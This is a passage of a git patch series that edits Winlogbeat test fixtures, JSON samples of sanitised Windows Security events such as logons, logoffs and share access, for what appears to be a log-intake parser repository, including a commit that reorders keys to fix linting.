"version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "hostname" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "ACC0123" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "ACC0123", + "target": { + "domain": "ACC0123", + "name": "Guest" + } + }, + "winlog": { + "activity_id": "{11111111-2222-3333-4444-555555555555}", + "api": "wineventlog", + 
"channel": "Security", + "computer_name": "ACC0123.johndoe.com", + "event_id": "4798", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x3e7" + }, + "opcode": "Info", + "process": { + "pid": 668, + "thread": { + "id": 8860 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "1524672", + "task": "User Account Management" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_5140.json b/Beats/winlogbeat/tests/security_event_5140.json index cde1d5c3c..8413484f9 100644 --- a/Beats/winlogbeat/tests/security_event_5140.json +++ b/Beats/winlogbeat/tests/security_event_5140.json @@ -93,11 +93,6 @@ "api": "wineventlog", "channel": "Security", "computer_name": "HOST01.company.test", - "event_data": { - "AccessMaskDescription": [ - "Create Child" - ] - }, "event_id": "5140", "keywords": [ "Audit Success" diff --git a/Beats/winlogbeat/tests/security_event_5145.json b/Beats/winlogbeat/tests/security_event_5145.json index 99a17d54f..ec1e78d54 100644 --- a/Beats/winlogbeat/tests/security_event_5145.json +++ b/Beats/winlogbeat/tests/security_event_5145.json @@ -96,13 +96,6 @@ "api": "wineventlog", "channel": "Security", "computer_name": "host01.company.test", - "event_data": { - "AccessMaskDescription": [ - "List Object", - "READ_CONTROL", - "SYNCHRONIZE" - ] - }, "event_id": "5145", "keywords": [ "Audit Success" From ce15f8192df09ce7a518c56479354e2ad1ffe28e Mon Sep 17 00:00:00 2001 
From: LenaigKaliou Date: Thu, 14 Nov 2024 11:43:35 +0100 Subject: [PATCH 16/84] fixed linting issues --- Beats/winlogbeat/tests/security_event_4624.json | 4 ++-- Beats/winlogbeat/tests/security_event_4625.json | 4 ++-- Beats/winlogbeat/tests/security_event_4634.json | 4 ++-- Beats/winlogbeat/tests/security_event_4662.json | 4 ++-- Beats/winlogbeat/tests/security_event_4672.json | 4 ++-- Beats/winlogbeat/tests/security_event_4689.json | 4 ++-- Beats/winlogbeat/tests/security_event_4720.json | 4 ++-- Beats/winlogbeat/tests/security_event_4722.json | 4 ++-- Beats/winlogbeat/tests/security_event_4723.json | 4 ++-- Beats/winlogbeat/tests/security_event_4725.json | 4 ++-- Beats/winlogbeat/tests/security_event_4726.json | 4 ++-- Beats/winlogbeat/tests/security_event_4768.json | 4 ++-- Beats/winlogbeat/tests/security_event_4769.json | 4 ++-- Beats/winlogbeat/tests/security_event_4798.json | 4 ++-- 14 files changed, 28 insertions(+), 28 deletions(-) diff --git a/Beats/winlogbeat/tests/security_event_4624.json b/Beats/winlogbeat/tests/security_event_4624.json index 9e8cdfb26..fe8a200a5 100644 --- a/Beats/winlogbeat/tests/security_event_4624.json +++ b/Beats/winlogbeat/tests/security_event_4624.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"agent\":{\"version\":\"7.0.0\",\"hostname\":\"hostname\",\"id\":\"abcd1234-abcd-1234-ef56-abcdef123456\",\"ephemeral_id\":\"12345678-1234-5678-9012-123456789012\",\"type\":\"winlogbeat\"},\"host\":{\"hostname\":\"hostname\",\"os\":{\"version\":\"10.0\",\"build\":\"17763.6414\",\"family\":\"windows\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"name\":\"Windows Server 2019 Datacenter\"},\"id\":\"abcdefab-1234-5678-9012-abcdefabcdef\",\"name\":\"hostname\",\"architecture\":\"x86_64\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.0.0\"},\"event\":{\"created\":\"2024-11-12T08:41:07.164Z\",\"action\":\"Logon\",\"code\":4624,\"kind\":\"event\"},\"tags\":[\"beats_input_codec_plain_applied\"],\"winlog\":{\"keywords\":[\"Audit Success\"],\"api\":\"wineventlog\",\"version\":2,\"process\":{\"pid\":752,\"thread\":{\"id\":7960}},\"record_id\":1170100815,\"event_data\":{\"TargetLinkedLogonId\":\"0x0\",\"IpPort\":\"29051\",\"TargetOutboundUserName\":\"-\",\"ImpersonationLevel\":\"%%1833\",\"TargetDomainName\":\"DOMAIN\",\"TargetOutboundDomainName\":\"-\",\"IpAddress\":\"1.2.3.4\",\"LogonProcessName\":\"Process 
\",\"WorkstationName\":\"WS-USER-01\",\"LmPackageName\":\"-\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessId\":\"0x2f0\",\"VirtualAccount\":\"%%1843\",\"SubjectLogonId\":\"0x3e7\",\"KeyLength\":\"0\",\"RestrictedAdminMode\":\"-\",\"TargetUserSid\":\"S-4-5-6\",\"ElevatedToken\":\"%%1843\",\"SubjectUserName\":\"WS-USER-01$\",\"LogonGuid\":\"{00000000-0000-0000-0000-000000000000}\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"SubjectDomainName\":\"DOMAIN\",\"TargetUserName\":\"target_user\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"TargetLogonId\":\"0xfcebb74a\",\"AuthenticationPackageName\":\"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0\"},\"event_id\":4624,\"computer_name\":\"hostname.company.com\",\"channel\":\"Security\",\"task\":\"Logon\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"opcode\":\"Info\"},\"log\":{\"level\":\"information\"},\"message\":\"An account was successfully logged on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tWS-USER-01$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nLogon Information:\\n\\tLogon Type:\\t\\t3\\n\\tRestricted Admin Mode:\\t-\\n\\tVirtual Account:\\t\\tNo\\n\\tElevated Token:\\t\\tNo\\n\\nImpersonation Level:\\t\\tImpersonation\\n\\nNew Logon:\\n\\tSecurity ID:\\t\\tS-4-5-6\\n\\tAccount Name:\\t\\ttarget_user\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0xFCEBB74A\\n\\tLinked Logon ID:\\t\\t0x0\\n\\tNetwork Account Name:\\t-\\n\\tNetwork Account Domain:\\t-\\n\\tLogon GUID:\\t\\t{00000000-0000-0000-0000-000000000000}\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x2f0\\n\\tProcess Name:\\t\\tC:\\\\Windows\\\\System32\\\\executable.exe\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tWS-USER-01\\n\\tSource Network Address:\\t1.2.3.4\\n\\tSource Port:\\t\\t29051\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tProcess \\n\\tAuthentication 
Package:\\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\\n\\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\\n\\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\\n\\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. 
This will be 0 if no session key was requested.\",\"@version\":\"1\",\"@timestamp\":\"2024-11-12T08:41:05.803Z\"}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"agent\":{\"version\":\"7.0.0\",\"hostname\":\"hostname\",\"id\":\"abcd1234-abcd-1234-ef56-abcdef123456\",\"ephemeral_id\":\"12345678-1234-5678-9012-123456789012\",\"type\":\"winlogbeat\"},\"host\":{\"hostname\":\"hostname\",\"os\":{\"version\":\"10.0\",\"build\":\"17763.6414\",\"family\":\"windows\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"name\":\"Windows Server 2019 Datacenter\"},\"id\":\"abcdefab-1234-5678-9012-abcdefabcdef\",\"name\":\"hostname\",\"architecture\":\"x86_64\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.0.0\"},\"event\":{\"created\":\"2024-11-12T08:41:07.164Z\",\"action\":\"Logon\",\"code\":4624,\"kind\":\"event\"},\"tags\":[\"beats_input_codec_plain_applied\"],\"winlog\":{\"keywords\":[\"Audit Success\"],\"api\":\"wineventlog\",\"version\":2,\"process\":{\"pid\":752,\"thread\":{\"id\":7960}},\"record_id\":1170100815,\"event_data\":{\"TargetLinkedLogonId\":\"0x0\",\"IpPort\":\"29051\",\"TargetOutboundUserName\":\"-\",\"ImpersonationLevel\":\"%%1833\",\"TargetDomainName\":\"DOMAIN\",\"TargetOutboundDomainName\":\"-\",\"IpAddress\":\"1.2.3.4\",\"LogonProcessName\":\"Process 
\",\"WorkstationName\":\"WS-USER-01\",\"LmPackageName\":\"-\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessId\":\"0x2f0\",\"VirtualAccount\":\"%%1843\",\"SubjectLogonId\":\"0x3e7\",\"KeyLength\":\"0\",\"RestrictedAdminMode\":\"-\",\"TargetUserSid\":\"S-4-5-6\",\"ElevatedToken\":\"%%1843\",\"SubjectUserName\":\"WS-USER-01$\",\"LogonGuid\":\"{00000000-0000-0000-0000-000000000000}\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"SubjectDomainName\":\"DOMAIN\",\"TargetUserName\":\"target_user\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"TargetLogonId\":\"0xfcebb74a\",\"AuthenticationPackageName\":\"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0\"},\"event_id\":4624,\"computer_name\":\"hostname.company.com\",\"channel\":\"Security\",\"task\":\"Logon\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"opcode\":\"Info\"},\"log\":{\"level\":\"information\"},\"message\":\"An account was successfully logged on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tWS-USER-01$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nLogon Information:\\n\\tLogon Type:\\t\\t3\\n\\tRestricted Admin Mode:\\t-\\n\\tVirtual Account:\\t\\tNo\\n\\tElevated Token:\\t\\tNo\\n\\nImpersonation Level:\\t\\tImpersonation\\n\\nNew Logon:\\n\\tSecurity ID:\\t\\tS-4-5-6\\n\\tAccount Name:\\t\\ttarget_user\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0xFCEBB74A\\n\\tLinked Logon ID:\\t\\t0x0\\n\\tNetwork Account Name:\\t-\\n\\tNetwork Account Domain:\\t-\\n\\tLogon GUID:\\t\\t{00000000-0000-0000-0000-000000000000}\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x2f0\\n\\tProcess Name:\\t\\tC:\\\\Windows\\\\System32\\\\executable.exe\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tWS-USER-01\\n\\tSource Network Address:\\t1.2.3.4\\n\\tSource Port:\\t\\t29051\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tProcess \\n\\tAuthentication 
Package:\\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\\n\\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\\n\\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\\n\\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. 
This will be 0 if no session key was requested.\",\"@version\":\"1\",\"@timestamp\":\"2024-11-12T08:41:05.803Z\"}" + } }, "expected": { "message": "{\"agent\":{\"version\":\"7.0.0\",\"hostname\":\"hostname\",\"id\":\"abcd1234-abcd-1234-ef56-abcdef123456\",\"ephemeral_id\":\"12345678-1234-5678-9012-123456789012\",\"type\":\"winlogbeat\"},\"host\":{\"hostname\":\"hostname\",\"os\":{\"version\":\"10.0\",\"build\":\"17763.6414\",\"family\":\"windows\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"name\":\"Windows Server 2019 Datacenter\"},\"id\":\"abcdefab-1234-5678-9012-abcdefabcdef\",\"name\":\"hostname\",\"architecture\":\"x86_64\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.0.0\"},\"event\":{\"created\":\"2024-11-12T08:41:07.164Z\",\"action\":\"Logon\",\"code\":4624,\"kind\":\"event\"},\"tags\":[\"beats_input_codec_plain_applied\"],\"winlog\":{\"keywords\":[\"Audit Success\"],\"api\":\"wineventlog\",\"version\":2,\"process\":{\"pid\":752,\"thread\":{\"id\":7960}},\"record_id\":1170100815,\"event_data\":{\"TargetLinkedLogonId\":\"0x0\",\"IpPort\":\"29051\",\"TargetOutboundUserName\":\"-\",\"ImpersonationLevel\":\"%%1833\",\"TargetDomainName\":\"DOMAIN\",\"TargetOutboundDomainName\":\"-\",\"IpAddress\":\"1.2.3.4\",\"LogonProcessName\":\"Process 
\",\"WorkstationName\":\"WS-USER-01\",\"LmPackageName\":\"-\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessId\":\"0x2f0\",\"VirtualAccount\":\"%%1843\",\"SubjectLogonId\":\"0x3e7\",\"KeyLength\":\"0\",\"RestrictedAdminMode\":\"-\",\"TargetUserSid\":\"S-4-5-6\",\"ElevatedToken\":\"%%1843\",\"SubjectUserName\":\"WS-USER-01$\",\"LogonGuid\":\"{00000000-0000-0000-0000-000000000000}\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"SubjectDomainName\":\"DOMAIN\",\"TargetUserName\":\"target_user\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"TargetLogonId\":\"0xfcebb74a\",\"AuthenticationPackageName\":\"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0\"},\"event_id\":4624,\"computer_name\":\"hostname.company.com\",\"channel\":\"Security\",\"task\":\"Logon\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"opcode\":\"Info\"},\"log\":{\"level\":\"information\"},\"message\":\"An account was successfully logged on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tWS-USER-01$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nLogon Information:\\n\\tLogon Type:\\t\\t3\\n\\tRestricted Admin Mode:\\t-\\n\\tVirtual Account:\\t\\tNo\\n\\tElevated Token:\\t\\tNo\\n\\nImpersonation Level:\\t\\tImpersonation\\n\\nNew Logon:\\n\\tSecurity ID:\\t\\tS-4-5-6\\n\\tAccount Name:\\t\\ttarget_user\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0xFCEBB74A\\n\\tLinked Logon ID:\\t\\t0x0\\n\\tNetwork Account Name:\\t-\\n\\tNetwork Account Domain:\\t-\\n\\tLogon GUID:\\t\\t{00000000-0000-0000-0000-000000000000}\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x2f0\\n\\tProcess Name:\\t\\tC:\\\\Windows\\\\System32\\\\executable.exe\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tWS-USER-01\\n\\tSource Network Address:\\t1.2.3.4\\n\\tSource Port:\\t\\t29051\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tProcess \\n\\tAuthentication 
Package:\\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\\n\\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\\n\\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\\n\\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.\",\"@version\":\"1\",\"@timestamp\":\"2024-11-12T08:41:05.803Z\"}", diff --git a/Beats/winlogbeat/tests/security_event_4625.json b/Beats/winlogbeat/tests/security_event_4625.json index ac5882d46..85bda7ac7 100644 --- a/Beats/winlogbeat/tests/security_event_4625.json +++ b/Beats/winlogbeat/tests/security_event_4625.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:40:34.260Z\",\"event\":{\"action\":\"Logon\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4625\",\"created\":\"2024-11-12T08:40:35.900Z\",\"kind\":\"event\",\"dataset\":\"system.security\"},\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{12345678-ABCD-EFAB-CDEF-123456789012}\",\"keywords\":[\"Audit Failure\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Logon\",\"process\":{\"pid\":824,\"thread\":{\"id\":28936}},\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"FailureReason\":\"%%2313\",\"IpPort\":\"-\",\"KeyLength\":\"0\",\"Status\":\"0xc000006d\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"IpAddress\":\"-\",\"LogonProcessName\":\"Channel\",\"SubjectLogonId\":\"0x3e7\",\"SubStatus\":\"0xc0000064\",\"WorkstationName\":\"WORKSTATION\",\"SubjectDomainName\":\"J_DOE\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"SubjectUserName\":\"WORKSTATION$\",\"LmPackageName\":\"-\",\"ProcessId\":\"0x338\",\"AuthenticationPackageName\":\"Kerberos\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"WORKSTATION.johndoe.com\",\"record_id\":2552812283,\"event_id\":\"4625\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"WORKSTATION\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"hostname
\",\"mac\":[\"00-00-00-00-00-00-00-00\",\"11-11-11-11-11-11\",\"A0-B1-C2-D3-E4-F5\",\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.14393.7426 (rs1_release.240926-1524)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2016 Datacenter\",\"build\":\"14393.7428\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"fe80::1234:5678:90ab:cde\",\"5.6.7.8\",\"fe80::1111:2222:3333:4444\",\"4.3.2.1\",\"fe80::aaaa:bbbb:cccc:dddd\",\"1.2.3.4\",\"fe80::1234:abcd:ef\",\"fe80::abcd:1234:567\",\"fe80::a0b1:c2d:3e4\"]},\"tags\":[\"Windows\",\"beats_input_raw_event\"]}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"@timestamp\":\"2024-11-12T08:40:34.260Z\",\"event\":{\"action\":\"Logon\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4625\",\"created\":\"2024-11-12T08:40:35.900Z\",\"kind\":\"event\",\"dataset\":\"system.security\"},\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{12345678-ABCD-EFAB-CDEF-123456789012}\",\"keywords\":[\"Audit 
Failure\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Logon\",\"process\":{\"pid\":824,\"thread\":{\"id\":28936}},\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"FailureReason\":\"%%2313\",\"IpPort\":\"-\",\"KeyLength\":\"0\",\"Status\":\"0xc000006d\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"IpAddress\":\"-\",\"LogonProcessName\":\"Channel\",\"SubjectLogonId\":\"0x3e7\",\"SubStatus\":\"0xc0000064\",\"WorkstationName\":\"WORKSTATION\",\"SubjectDomainName\":\"J_DOE\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"SubjectUserName\":\"WORKSTATION$\",\"LmPackageName\":\"-\",\"ProcessId\":\"0x338\",\"AuthenticationPackageName\":\"Kerberos\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"WORKSTATION.johndoe.com\",\"record_id\":2552812283,\"event_id\":\"4625\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"WORKSTATION\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"hostname\",\"mac\":[\"00-00-00-00-00-00-00-00\",\"11-11-11-11-11-11\",\"A0-B1-C2-D3-E4-F5\",\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.14393.7426 (rs1_release.240926-1524)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2016 Datacenter\",\"build\":\"14393.7428\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"fe80::1234:5678:90ab:cde\",\"5.6.7.8\",\"fe80::1111:2222:3333:4444\",\"4.3.2.1\",\"fe80::aaaa:bbbb:cccc:dddd\",\"1.2.3.4\",\"fe80::1234:abcd:ef\",\"fe80::abcd:1234:567\",\"fe80::a0b1:c2d:3e4\"]},\"tags\":[\"Windows\",\"beats_input_raw_event\"]}" + } }, "expected": { "message": 
"{\"@timestamp\":\"2024-11-12T08:40:34.260Z\",\"event\":{\"action\":\"Logon\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4625\",\"created\":\"2024-11-12T08:40:35.900Z\",\"kind\":\"event\",\"dataset\":\"system.security\"},\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{12345678-ABCD-EFAB-CDEF-123456789012}\",\"keywords\":[\"Audit Failure\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Logon\",\"process\":{\"pid\":824,\"thread\":{\"id\":28936}},\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"FailureReason\":\"%%2313\",\"IpPort\":\"-\",\"KeyLength\":\"0\",\"Status\":\"0xc000006d\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"IpAddress\":\"-\",\"LogonProcessName\":\"Channel\",\"SubjectLogonId\":\"0x3e7\",\"SubStatus\":\"0xc0000064\",\"WorkstationName\":\"WORKSTATION\",\"SubjectDomainName\":\"J_DOE\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"SubjectUserName\":\"WORKSTATION$\",\"LmPackageName\":\"-\",\"ProcessId\":\"0x338\",\"AuthenticationPackageName\":\"Kerberos\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"WORKSTATION.johndoe.com\",\"record_id\":2552812283,\"event_id\":\"4625\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"WORKSTATION\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"hostname\",\"mac\":[\"00-00-00-00-00-00-00-00\",\"11
-11-11-11-11-11\",\"A0-B1-C2-D3-E4-F5\",\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.14393.7426 (rs1_release.240926-1524)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2016 Datacenter\",\"build\":\"14393.7428\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"fe80::1234:5678:90ab:cde\",\"5.6.7.8\",\"fe80::1111:2222:3333:4444\",\"4.3.2.1\",\"fe80::aaaa:bbbb:cccc:dddd\",\"1.2.3.4\",\"fe80::1234:abcd:ef\",\"fe80::abcd:1234:567\",\"fe80::a0b1:c2d:3e4\"]},\"tags\":[\"Windows\",\"beats_input_raw_event\"]}", diff --git a/Beats/winlogbeat/tests/security_event_4634.json b/Beats/winlogbeat/tests/security_event_4634.json index ddc69e63b..035469c13 100644 --- a/Beats/winlogbeat/tests/security_event_4634.json +++ b/Beats/winlogbeat/tests/security_event_4634.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:42:47.895Z\",\"event\":{\"action\":\"Logoff\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4634\",\"created\":\"2024-11-12T08:42:48.190Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\"},\"message\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. 
